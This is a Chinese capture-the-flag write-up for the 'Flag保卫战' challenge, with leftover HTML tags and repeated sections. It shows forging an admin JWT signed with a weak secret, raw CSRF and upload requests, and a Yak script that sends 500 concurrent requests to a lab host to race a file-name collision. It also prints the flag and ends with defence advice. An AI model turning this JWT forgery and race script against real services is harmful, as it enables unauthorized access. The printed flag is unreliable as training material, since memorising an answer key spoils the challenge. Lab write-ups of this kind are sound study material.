JWT越权与并发请求攻击实战教学<\/h1>

题目概述<\/h2>
题目名称：Flag保卫战
Flag值：`SYC{75ec9b17-2284-447f-9faa-babccc8f159c}<\/code> 源码位置：https:\/\/github.com\/yaklang\/yaklang\/tree\/geek2023 核心考点：JWT越权、并发请求、脚本编写能力<\/p>`

初始发现<\/h2>


登录页面分析<\/strong>：<\/p>

访问靶场地址发现登录页面<\/li>
查看网页源码发现访客密码：123456<\/code><\/li>
发现API接口：\/flag?pass=<\/code><\/li>
<\/ul>
<\/li>

初步尝试<\/strong>：<\/p>

使用任意用户名(如"a")和访客密码123456<\/code>登录<\/li>
后台提示存在管理员用户<\/li>
获取flag的密码是"四个文件内容相连"<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞分析<\/h2>


JWT越权漏洞<\/strong>：<\/p>

上传文件时发现使用JWT进行鉴权<\/li>
解析JWT发现使用弱密码<\/li>
用户"a"的JWT可以被伪造为管理员"admin"<\/li>
<\/ul>
<\/li>

CSRF防护绕过<\/strong>：<\/p>

发现yak-token<\/code>上传字段<\/li>
前端JS显示有new-csrf-token<\/code>接口<\/li>
每次上传文件前会获取新的csrf-token<\/li>
<\/ul>
<\/li>

文件上传机制<\/strong>：<\/p>

文件名格式为用户名-随机值<\/code><\/li>
需要爆破碰撞出管理员-随机值<\/code>的文件<\/li>
<\/ul>
<\/li>
<\/ol>
攻击步骤<\/h2>
1. JWT伪造<\/h3>
解析原始JWT并修改为管理员权限：<\/p>
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.47k0jdPsb9JLdi1kgQxF9Gv4tyCoZ1T5nKZiuODYbbg
<\/code><\/pre>
2. CSRF Token获取<\/h3>
GET请求获取新token：<\/p>
GET \/new-csrf-token HTTP\/1.1
Host: 127.0.0.1:8089
Cookie: jwt-token=[伪造的管理员JWT]
<\/code><\/pre>
3. 文件上传<\/h3>
POST请求上传文件：<\/p>
POST \/upload HTTP\/1.1
Host: 127.0.0.1:8089
Cookie: jwt-token=[伪造的管理员JWT]; yak_csrf=[获取的CSRF_TOKEN]
Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryIDPlMGmz86uvgyNM

------WebKitFormBoundaryIDPlMGmz86uvgyNM
Content-Disposition: form-data; name="filename"; filename="1.zip"
Content-Type: text\/aa

1
------WebKitFormBoundaryIDPlMGmz86uvgyNM
Content-Disposition: form-data; name="yak-token"
[获取的CSRF_TOKEN]
------WebKitFormBoundaryIDPlMGmz86uvgyNM--
<\/code><\/pre>
4. Flag获取<\/h3>
尝试访问flag接口：<\/p>
GET \/flag?pass=1111 HTTP\/1.1
Host: 127.0.0.1:8089
<\/code><\/pre>
自动化攻击脚本(Yak语言)<\/h2>
\/\/ 获取CSRF Token
<\/span><\/span><\/span><\/span>getToken<\/span> = func<\/span>() {
<\/span><\/span>    raw<\/span> = `GET \/new-csrf-token HTTP\/1.1
<\/span><\/span><\/span>Host: 127.0.0.1:8089
<\/span><\/span><\/span>Cookie: jwt-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.47k0jdPsb9JLdi1kgQxF9Gv4tyCoZ1T5nKZiuODYbbg`<\/span>
<\/span><\/span>    rsp<\/span>, _<\/span> = poc<\/span>.HTTP<\/span>(raw<\/span>, poc<\/span>.https<\/span>(false<\/span>))~<\/span>
<\/span><\/span>    cookie<\/span> = poc<\/span>.GetHTTPPacketCookie<\/span>(rsp<\/span>, "yak_csrf"<\/span>)
<\/span><\/span>    _<\/span>, body<\/span> = poc<\/span>.Split<\/span>(rsp<\/span>)
<\/span><\/span>    return<\/span> cookie<\/span>, string(body<\/span>)
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 文件上传
<\/span><\/span><\/span><\/span>postUpload<\/span> = func<\/span>(cookie<\/span>, token<\/span>) {
<\/span><\/span>    raw2<\/span> = f<\/span>`POST \/upload HTTP\/1.1
<\/span><\/span><\/span>Host: 127.0.0.1:8089
<\/span><\/span><\/span>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36
<\/span><\/span><\/span>Cookie: jwt-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.47k0jdPsb9JLdi1kgQxF9Gv4tyCoZ1T5nKZiuODYbbg; yak_csrf=${cookie}; Expires="Fri%2C+08+Sep+2023+13%3A19%3A34+GMT"; Max-Age=10; HttpOnly=; SameSite=Lax
<\/span><\/span><\/span>Accept: *\/*
<\/span><\/span><\/span>Referer: http:\/\/192.168.124.14:8089\/upload
<\/span><\/span><\/span>Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ru;q=0.6
<\/span><\/span><\/span>X-Requested-With: XMLHttpRequest
<\/span><\/span><\/span>Origin: http:\/\/192.168.124.14:8089
<\/span><\/span><\/span>Accept-Encoding: gzip, deflate
<\/span><\/span><\/span>Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryIDPlMGmz86uvgyNM
<\/span><\/span><\/span>Content-Length: 385
<\/span><\/span><\/span>
<\/span><\/span><\/span>------WebKitFormBoundaryIDPlMGmz86uvgyNM
<\/span><\/span><\/span>Content-Disposition: form-data; name="filename"; filename="1.zip"
<\/span><\/span><\/span>Content-Type: text\/aa
<\/span><\/span><\/span>
<\/span><\/span><\/span>1
<\/span><\/span><\/span>------WebKitFormBoundaryIDPlMGmz86uvgyNM
<\/span><\/span><\/span>Content-Disposition: form-data; name="yak-token"
<\/span><\/span><\/span>
<\/span><\/span><\/span>${token}
<\/span><\/span><\/span>------WebKitFormBoundaryIDPlMGmz86uvgyNM--`<\/span>
<\/span><\/span>    poc<\/span>.HTTP<\/span>(raw2<\/span>, poc<\/span>.https<\/span>(false<\/span>))~<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 获取Flag
<\/span><\/span><\/span><\/span>getFlag<\/span> = func<\/span>() {
<\/span><\/span>    raw<\/span> = `GET \/flag?pass=1111 HTTP\/1.1
<\/span><\/span><\/span>Host: 127.0.0.1:8089
<\/span><\/span><\/span>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/83.0.4103.116 Safari\/537.36`<\/span>
<\/span><\/span>    poc<\/span>.HTTP<\/span>(raw<\/span>, poc<\/span>.https<\/span>(false<\/span>))~<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 并发执行
<\/span><\/span><\/span><\/span>synWg<\/span> = sync<\/span>.NewSizedWaitGroup<\/span>(20<\/span>)
<\/span><\/span>for<\/span> i<\/span> = 0<\/span>; i<\/span> < 500<\/span>; i<\/span>++<\/span> {
<\/span><\/span>    synWg<\/span>.Add<\/span>()
<\/span><\/span>    go<\/span> fn<\/span> {
<\/span><\/span>        defer<\/span> synWg<\/span>.Done<\/span>()
<\/span><\/span>        cookie<\/span>, token<\/span> = getToken<\/span>()
<\/span><\/span>        postUpload<\/span>(cookie<\/span>, token<\/span>)
<\/span><\/span>        getFlag<\/span>()
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>synWg<\/span>.Wait<\/span>()
<\/span><\/span><\/code><\/pre>关键点总结<\/h2>


JWT安全<\/strong>：<\/p>

避免使用弱密钥<\/li>
对JWT进行签名验证<\/li>
不要将敏感信息存储在JWT中<\/li>
<\/ul>
<\/li>

CSRF防护<\/strong>：<\/p>

确保CSRF token不可预测<\/li>
绑定用户会话<\/li>
设置合理的过期时间<\/li>
<\/ul>
<\/li>

文件上传安全<\/strong>：<\/p>

限制上传文件类型<\/li>
不要使用可预测的文件名<\/li>
隔离不同用户的文件存储<\/li>
<\/ul>
<\/li>

并发攻击防护<\/strong>：<\/p>

实施请求频率限制<\/li>
对敏感操作增加验证步骤<\/li>
监控异常请求模式<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

使用强密码和安全的JWT签名算法<\/li>
实现完善的CSRF防护机制<\/li>
文件上传功能应严格验证用户权限<\/li>
对敏感接口实施速率限制<\/li>
定期清理临时文件<\/li>
实施完善的日志记录和监控<\/li>
<\/ol>

JWT越权与并发请求攻击实战教学<\/h1>

题目概述<\/h2> 题目名称：Flag保卫战 Flag值：SYC{75ec9b17-2284-447f-9faa-babccc8f159c}<\/code> 源码位置：https:\/\/github.com\/yaklang\/yaklang\/tree\/geek2023 核心考点：JWT越权、并发请求、脚本编写能力<\/p>

攻击步骤<\/h2>

防御建议<\/h2> 使用强密码和安全的JWT签名算法<\/li> 实现完善的CSRF防护机制<\/li> 文件上传功能应严格验证用户权限<\/li> 对敏感接口实施速率限制<\/li> 定期清理临时文件<\/li> 实施完善的日志记录和监控<\/li> <\/ol>

题目概述<\/h2>
题目名称：Flag保卫战
Flag值：`SYC{75ec9b17-2284-447f-9faa-babccc8f159c}<\/code> 源码位置：https:\/\/github.com\/yaklang\/yaklang\/tree\/geek2023 核心考点：JWT越权、并发请求、脚本编写能力<\/p>`

防御建议<\/h2>

使用强密码和安全的JWT签名算法<\/li>
实现完善的CSRF防护机制<\/li>
文件上传功能应严格验证用户权限<\/li>
对敏感接口实施速率限制<\/li>
定期清理临时文件<\/li>
实施完善的日志记录和监控<\/li> <\/ol>